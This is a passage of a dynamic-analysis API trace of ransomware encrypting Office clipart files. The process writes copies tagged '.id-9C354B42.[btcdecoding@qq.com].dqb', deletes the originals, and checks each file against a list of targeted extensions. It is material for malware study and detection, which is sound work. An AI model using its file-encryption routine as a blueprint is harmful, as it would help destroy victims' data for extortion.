[0056.779] CloseHandle (hObject=0x220) returned 1 [0056.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf")) returned 1 [0056.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0056.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0056.779] lstrlenW (lpString=".doc") returned 4 [0056.780] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString=".docx") returned 5 [0056.780] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.780] lstrlenW (lpString=".pdf") returned 4 [0056.780] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString=".xls") returned 4 [0056.780] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.780] lstrlenW (lpString=".xlsx") returned 5 [0056.780] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.780] lstrlenW (lpString=".ppt") returned 4 [0056.780] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0056.780] lstrlenW (lpString=".zip") returned 4 [0056.780] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.780] lstrlenW (lpString=".rar") returned 4 [0056.780] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString=".bz2") returned 4 [0056.780] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString=".7z") returned 3 [0056.780] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0056.780] lstrlenW (lpString=".dbf") returned 4 [0056.780] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0056.780] lstrlenW (lpString=".1cd") returned 4 [0056.780] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 63 [0056.780] lstrlenW (lpString=".jpg") returned 4 [0056.780] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.781] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.781] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0056.781] GetLastError () returned 0x0 [0056.781] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xed4, lpOverlapped=0x0) returned 1 [0056.782] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xee0, lpOverlapped=0x0) returned 1 [0056.783] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.783] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.783] SetEndOfFile (hFile=0x164) returned 1 [0056.784] CloseHandle (hObject=0x164) returned 1 [0056.784] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.784] SetEndOfFile (hFile=0x220) returned 1 [0056.785] CloseHandle (hObject=0x220) returned 1 [0056.785] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.785] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf")) returned 1 [0056.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0056.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0056.785] lstrlenW (lpString=".doc") returned 4 [0056.785] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.785] lstrlenW (lpString=".docx") returned 5 [0056.785] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.785] lstrlenW (lpString=".pdf") returned 4 [0056.785] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.785] lstrlenW (lpString=".xls") returned 4 [0056.785] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.785] lstrlenW (lpString=".xlsx") returned 5 [0056.785] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.785] lstrlenW (lpString=".ppt") returned 4 [0056.785] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0056.786] lstrlenW (lpString=".zip") returned 4 [0056.786] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.786] lstrlenW (lpString=".rar") returned 4 [0056.786] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString=".bz2") returned 4 [0056.786] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString=".7z") returned 3 [0056.786] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0056.786] lstrlenW (lpString=".dbf") returned 4 [0056.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0056.786] lstrlenW (lpString=".1cd") returned 4 [0056.786] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 63 [0056.786] lstrlenW (lpString=".jpg") returned 4 [0056.786] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.786] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=2436) returned 1 [0056.786] CloseHandle (hObject=0x220) returned 1 [0056.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf")) returned 0x20 [0056.786] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0056.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0056.787] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.787] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0056.787] GetLastError () returned 0x0 [0056.787] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x984, lpOverlapped=0x0) returned 1 [0056.788] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x990, lpOverlapped=0x0) returned 1 [0056.789] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.789] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.789] SetEndOfFile (hFile=0x164) returned 1 [0056.790] CloseHandle (hObject=0x164) returned 1 [0056.790] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.790] SetEndOfFile (hFile=0x220) returned 1 [0056.790] CloseHandle (hObject=0x220) returned 1 [0056.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf")) returned 1 [0056.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0056.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0056.791] lstrlenW (lpString=".doc") returned 4 [0056.791] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.791] lstrlenW (lpString=".docx") returned 5 [0056.791] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.791] lstrlenW (lpString=".pdf") returned 4 [0056.791] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.791] lstrlenW (lpString=".xls") returned 4 [0056.791] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.791] lstrlenW (lpString=".xlsx") returned 5 [0056.791] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.791] lstrlenW (lpString=".ppt") returned 4 [0056.791] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0056.791] lstrlenW (lpString=".zip") returned 4 [0056.791] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.791] lstrlenW (lpString=".rar") returned 4 [0056.792] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.792] lstrlenW (lpString=".bz2") returned 4 [0056.792] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.792] lstrlenW (lpString=".7z") returned 3 [0056.792] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0056.792] lstrlenW (lpString=".dbf") returned 4 [0056.792] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0056.792] lstrlenW (lpString=".1cd") returned 4 [0056.792] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0056.792] lstrlenW (lpString=".jpg") returned 4 [0056.792] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.792] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.793] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0056.793] GetLastError () returned 0x0 [0056.793] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xaac, lpOverlapped=0x0) returned 1 [0056.794] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xab0, lpOverlapped=0x0) returned 1 [0056.795] ReadFile (in: hFile=0x220, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.795] WriteFile (in: hFile=0x164, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.795] SetEndOfFile (hFile=0x164) returned 1 [0056.796] CloseHandle (hObject=0x164) returned 1 [0056.796] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.796] SetEndOfFile (hFile=0x220) returned 1 [0056.797] CloseHandle (hObject=0x220) returned 1 [0056.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.797] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01080_.wmf")) returned 1 [0056.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0056.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0056.797] lstrlenW (lpString=".doc") returned 4 [0056.797] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.797] lstrlenW (lpString=".docx") returned 5 [0056.797] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.797] lstrlenW (lpString=".pdf") returned 4 [0056.797] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.797] lstrlenW (lpString=".xls") returned 4 [0056.797] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.797] lstrlenW (lpString=".xlsx") returned 5 [0056.797] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.797] lstrlenW (lpString=".ppt") returned 4 [0056.797] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0056.798] lstrlenW (lpString=".zip") returned 4 [0056.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.798] lstrlenW (lpString=".rar") returned 4 [0056.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.798] lstrlenW (lpString=".bz2") returned 4 [0056.798] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.798] lstrlenW (lpString=".7z") returned 3 [0056.798] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0056.798] lstrlenW (lpString=".dbf") returned 4 [0056.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0056.798] lstrlenW (lpString=".1cd") returned 4 [0056.798] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 63 [0056.798] lstrlenW (lpString=".jpg") returned 4 [0056.798] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.016] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.017] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.017] GetLastError () returned 0x0 [0058.017] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x1c08, lpOverlapped=0x0) returned 1 [0058.019] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1c10, lpOverlapped=0x0) returned 1 [0058.020] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.020] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.020] SetEndOfFile (hFile=0x180) returned 1 [0058.020] CloseHandle (hObject=0x180) returned 1 [0058.020] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.020] SetEndOfFile (hFile=0x1fc) returned 1 [0058.021] CloseHandle (hObject=0x1fc) returned 1 [0058.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.021] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01603_.wmf")) returned 1 [0058.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0058.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0058.022] lstrlenW (lpString=".doc") returned 4 [0058.022] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.022] lstrlenW (lpString=".docx") returned 5 [0058.022] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.022] lstrlenW (lpString=".pdf") returned 4 [0058.022] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.022] lstrlenW (lpString=".xls") returned 4 [0058.022] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.022] lstrlenW (lpString=".xlsx") returned 5 [0058.022] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.022] lstrlenW (lpString=".ppt") returned 4 [0058.022] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0058.022] lstrlenW (lpString=".zip") returned 4 [0058.022] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.022] lstrlenW (lpString=".rar") returned 4 [0058.022] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.022] lstrlenW (lpString=".bz2") returned 4 [0058.022] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.022] lstrlenW (lpString=".7z") returned 3 [0058.022] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0058.022] lstrlenW (lpString=".dbf") returned 4 [0058.022] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0058.023] lstrlenW (lpString=".1cd") returned 4 [0058.023] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.023] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 63 [0058.023] lstrlenW (lpString=".jpg") returned 4 [0058.023] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.023] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.023] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.023] GetLastError () returned 0x0 [0058.023] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x3a94, lpOverlapped=0x0) returned 1 [0058.026] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x3aa0, lpOverlapped=0x0) returned 1 [0058.027] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.027] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.027] SetEndOfFile (hFile=0x180) returned 1 [0058.027] CloseHandle (hObject=0x180) returned 1 [0058.027] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.027] SetEndOfFile (hFile=0x1fc) returned 1 [0058.028] CloseHandle (hObject=0x1fc) returned 1 [0058.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.028] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf")) returned 1 [0058.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0058.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0058.029] lstrlenW (lpString=".doc") returned 4 [0058.029] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.029] lstrlenW (lpString=".docx") returned 5 [0058.029] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.029] lstrlenW (lpString=".pdf") returned 4 [0058.029] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.029] lstrlenW (lpString=".xls") returned 4 [0058.029] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.029] lstrlenW (lpString=".xlsx") returned 5 [0058.029] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.029] lstrlenW (lpString=".ppt") returned 4 [0058.029] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.029] 